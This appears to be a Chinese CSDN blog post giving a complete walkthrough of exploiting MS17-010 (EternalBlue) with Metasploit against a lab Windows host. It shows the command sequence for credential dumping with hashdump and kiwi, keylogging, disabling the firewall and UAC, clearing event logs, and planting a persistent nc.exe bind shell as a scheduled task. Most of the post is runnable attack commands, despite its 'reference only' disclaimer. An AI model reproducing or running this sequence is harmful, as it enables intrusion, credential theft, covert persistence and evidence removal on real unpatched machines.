MS17_010永恒之蓝(仅供参考不可实践)

最新推荐文章于 2024-08-06 20:45:43 发布
最新推荐文章于 2024-08-06 20:45:43 发布
阅读量667 收藏 8
点赞数 4
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207482/article/details/134802292
版权
文章详细描述了MS17-010漏洞利用过程,涉及漏洞检测、远程代码执行、获取敏感信息、防火墙操作和后门设置等步骤,展示了黑客如何利用EternalBlue进行攻击。
摘要由CSDN通过智能技术生成 
漏洞为外界所知源于勒索病毒的爆发,该病毒利用NSA(美国国家安全局)泄露的网络攻击工具 永恒之蓝( EternalBlue )改造而成,漏洞通过TCP的445和139端口,利用SMB远程代码执行漏洞,攻击者可以在目标系统上执行任意代码
SMB(ServerMessageBlock)协议作为一种局域网文件共享传输协议,常被用来作为共享文件安全传输研究的平台
漏洞名称:CVE-2017-0143/44/45/46/47/48
安全公告:MS17-010
补丁文件:windows6.1-kb4012212-x64、windows6.1-kb4012215-x64
漏洞利用的步骤
1)找到目标主机的漏洞列表,openvas
2)使用“辅助模块”脚本,探测某漏洞是否可利用,msf
3)使用“利用模块”脚本,进行侵入,msf
4)获取目标主机账户和密码、记录键盘、截屏、清除日志……,meterpeter
5)管理防火墙、管理用户账户控制、修改注册表,cmd
6)安装后门程序,长期驻留(即使目标漏洞已修补),nc




MS17-010漏洞利用过程:

一.验证MS17-010漏洞是否存在
0.登录MSF控制台: msfconsole -q
1.搜索MS17-010漏洞相关程序:search ms17-010
2.序号3对应的程序是漏洞检测程序,能够判断目标主机是否存在MS17-010漏洞
use 3
3.设置目标地址:set rhosts 192.168.10.142  (目标主机地址)
4.运行程序:run/exploit

结果:Host is likely vulnerable to MS17-010!(主机可能存在MS17-010漏洞)

二.利用漏洞进行攻击
1.use 0 (使用序号0对应的漏洞利用程序)
2.设置目标地址:set rhosts 192.168.10.142  (目标主机地址)
3.run (运行)

结果:metepreter>  代表漏洞利用成功,建立了与目标主机的连接

三.获取账号密码信息
成功与目标主机建立了连接:
metepreter> hashdump (获取目标主机的用户名及加密密码)
metepreter>load kiwi (加载kiwi模块,获取凭证信息时可能会出现权限问题,可以迁移到一个SYSTEM用户权限进程下)
metepreter>ps -S "csrss" (搜索csrss.exe进程,获取进程号)
metepreter>migrate 进程号 (迁移进程,获取SYSTEM权限)
metepreter>creds_all (获取所有凭证,加密的密码会进行解析)

四.进行键盘记录及屏幕截图及屏幕共享
metepreter>screenshot (进行屏幕截图)
metepreter> screenshare(屏幕共享)

进行键盘记录:
metepreter>ps -S "explorer.exe" (搜索名为explorer的进程,身份为Administrator)
metepreter>migrate 进程序号  (进程迁移到对应序号的进程)
metepreter>getuid (获取用户信息)
metepreter>run post/windows/capture/keylog_recorder (开启键盘记录器)
在win2008用键盘输入内容
在kali2022查看键盘记录内容的位置
metepreter>cat 键盘记录保存位置的文件名

五.开关目标主机防火墙,在防火墙开启后门端口
meterpreter > shell
C:\Windows\system32> chcp  65001          //消除乱码
C:\Windows\system32> netsh  advfirewall  set  allprofiles  state  off 
C:\Windows\system32> netsh  advfirewall  set  allprofiles  state  on
C:\Windows\system32> netsh firewall add portopening tcp 6666 backdoor enable all

六.关闭用户账户控制,清理日志
c:\windows\system> reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
c:\windows\system32>exit
meterpreter>clearev

七.上传nc.exe瑞士军刀到目标主机,设置nc.exe开启自启
meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32  //上传nc到目标主机
meterpreter > ls nc.exe
meterpreter > shell
C:\Windows\system32>chcp 65001          //消除乱码
C:\Windows\system32>
schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\
nc.exe -Ldp 6666 -e cmd.exe" /sc onstart

八.远程连接nc.exe
在kali中打开新的终端:
┌──(root㉿kali)-[~]
└─# nc  植入nc.exe程序地址  防火墙预留的端口
Lyx-0607
关注
MS17-010 补丁
05-15
此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。 对于 Microsoft Windows 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅受影响的软件和漏洞严重等级部分。 此安全更新可通过更正 SMBv1 处理经特殊设计的请求的方式来修复这些漏洞。 有关这些漏洞的详细信息,请参阅漏洞信息部分。 有关此更新的更多信息,请参阅 Microsoft 知识库文章 4013389。
关于 永恒之蓝MS17-010 补丁
weixin_30367945的博客
05-15 335
【KB4012598】:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598 适用于Windows XP 32位/64位/嵌入式、Windows Vista 32/64位、Windows Server 2003 SP2 32位/64位、Windows 8 32位/64位、Windows Server 2008 32位/64...
永恒之蓝(MS17-010)
最新发布
人们并不感谢罗辑
08-06 950
SMB协议SMB是一个协议服务器信息块,它是一个客户机/服务器,请求/响应协议,通过SMB协议可以在计算机间共享文件,命名管道等资源,电脑上网上邻居就是靠SMB实现的;
打补丁来修复ms17-010
2301_76815548的博客
04-05 422
不同的系统不同的补丁号。下载之后运行就可以了。
Windows各个系统勒索补丁下载地址
:)一位靓仔偶然路过的博客
02-15 4279
Windows XP Windows XP SP3 安全更新程序 (KB4012598) 下载地址 https://www.microsoft.com/en-us/download/details.aspx?id=55245 Windows XP SP2 x64 (64位)安全更新程序 (KB4012598) 下载地址 http://www.microsoft.com/downloads...
漏洞补丁:windwos补丁下载(MS17-010
guyuelin123的博客
11-01 4916
记录一下如何下载windows的补丁,起因为在群里搜集到一份其他格式排版的补丁报告(重庆信安网络安全等级测评),其称之为扫描渗透报告。
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
热门推荐
linxaiomo
02-20 1万+
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作:由于kali是64位,如果windows 7 是32 位,所以我们得安装wine3...
微软EternalBlue永恒之蓝漏洞攻击测试
我的学习笔记
02-28 4930
声明:仅供学习交流使用,个人实验笔记。排版比较懒。微软MS17-010理论:SMBv1 漏洞攻击,445端口。环境准备:攻击资源:攻击工具包 点我攻击者系统:Windows 7 Ultimate (x64) 点我受害者系统:Windows 7 Ultimate (x64) 点我,winXP,win2008,win2003均可。 点我辅助攻击用系统:kal...
2024年渗透测试流程-全(仅供学习,知识分享)_渗透测试教程(1),2024年最新还在等机会
2401_84563080的博客
05-06 1122
openssl心脏出血  https://paper.seebug.org/437/  http://www.anquan.us/static/drops/papers-1381.html  https://www.freebuf.com/sectool/33191.html445/ smb。ladp注入  http://www.4hou.com/technology/9090.html  https://www.freebuf.com/articles/web/149059.html443/ ssl。
NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析
weixin_34417200的博客
09-19 7170
本文讲的是NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析, 1. 概述 2017 年 4 月 14 日,黑客组织Shadow Brokers 公布了一批新的NSA(美国国家安全局)黑客工具。这批黑客工具中含有可以配合使用的一个攻击框架和多个攻击漏洞。这次的工具主要面向的是Windows系统,攻击框架非常易用,漏...
[系统安全] 五十三.DataCon竞赛 (2)2022年DataCon涉网分析之恶意样本IOC自动化提取详解
杨秀璋的专栏
09-01 3447
系统安全将更好地帮助初学者了解病毒逆向分析和系统安全。前文详细介绍2020 Coremail钓鱼邮件识别及分析内容。这篇文章是作者2022年参加清华大学、奇安信举办的DataCon比赛,主要是关于涉网FZ分析,包括恶意样本IOC自动化提取和攻击者画像分析两类题目。这篇文章来自L师妹的Writeup,经同意后分享给大家,推荐大家多关注她的文章,也希望对您有所帮助。
ms17-101补丁,永恒之蓝补丁
11-25
有效防止基于msb攻击的病毒,永恒之蓝,蠕虫病毒。。。。
MS17-010(Eternal blue永恒之蓝漏洞利用+修复方法
记录学习
06-21 3463
msf永恒之蓝漏洞复现过程以及修复建议
ms17-010永恒之蓝)搭建、攻击、打补丁
weixin_51387754的博客
05-31 3641
前言 写文目的:被问到ms17_010永恒之蓝漏洞怎么修补)? 那么作为网络安全的工作者,胜负欲于是就来了 WIN7虚拟机搭建 我所使用的虚拟机 ed2k://|file|cn_windows_7_ultimate_x64_dvd_x15-66043.iso|3341268992|7DD7FA757CE6D2DB78B6901F81A6907A|/ KALI虚拟机搭建 我所使用的虚拟机 以上两种可在官网自行下载,也可自行复制链接到迅雷进行下载 攻击过程 kali 192.168.80.129 win71
漏洞复现-永恒之蓝(MS17-010)
qq_43381463的博客
10-17 818
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
ms17-010 永恒之蓝
qq_62803993的博客
01-12 4594
什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
永恒之蓝ms17-010漏洞复现
qq_63092550的博客
11-16 415
运行成功后会出现meterpreter> ,Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,对目标系统进行更深入的渗透,如进入cmd、获取屏幕、上传/下载文件、创建持久后门等。meterpreter > run post/windows/manage/enable_rdp //启用目标主机的3389端口远程桌面。meterpreter > idletime //查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。
MS17-010补丁下载与安装,防WannaCrypt勒索软件前提!
weixin_33851604的博客
05-14 244
这个周未被勒索病毒刷屏了,虽然说域名的“停止开关”已被关闭,但马上就爆出已经升级为2.0,所谓的“停止开关”并不能阻止病毒蔓延, 所以目前最根本的办法就是先给所有电脑更新补丁!由于微软网站刚放出XP、2003补丁时,网站访问量太大,基本没法打开,很多人都下载失败!好在我第一时间抢到了更新包,并放分享到网盘里了,微信里的朋友好多都已下载!现在我将常用的补丁收集并分类整,更新到网盘了,有需要的请到网盘...
MS17-010远程溢出(CVE-2017-0143
p_utao的博客
09-03 2216
漏洞介绍 MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。 函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用。srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大
如何删除ms17_010(永恒之蓝)漏洞的补丁
02-16
要删除ms17_010永恒之蓝漏洞的补丁,您可以按照以下步骤进行操作: 1. 打开控制面板:在Windows操作系统中,点击开始菜单,然后选择控制面板。 2. 打开程序和功能:在控制面板中,找到并点击“程序”或“程序和功能”。 3. 查找安装的更新:在程序和功能窗口中,点击“查看安装的更新”或类似的选项。 4. 搜索补丁:在安装的更新列表中,使用搜索框或滚动查找列表,找到与ms17_010相关的补丁。通常,这些补丁的名称中会包含KB号码,例如KB4012212。 5. 右键点击补丁:找到ms17_010相关的补丁后,右键点击该补丁,并选择“卸载”或类似的选项。 6. 确认卸载:系统会提示您确认是否要卸载该补丁。请点击“是”或“确认”来继续卸载过程。 7. 完成卸载:等待系统完成卸载过程。一旦完成,您将收到相应的提示。 请注意,删除ms17_010漏洞的补丁可能会导致系统存在安全风险。在执行此操作之前,请确保您有其他安全措施来保护系统免受潜在的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lyx-0607

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值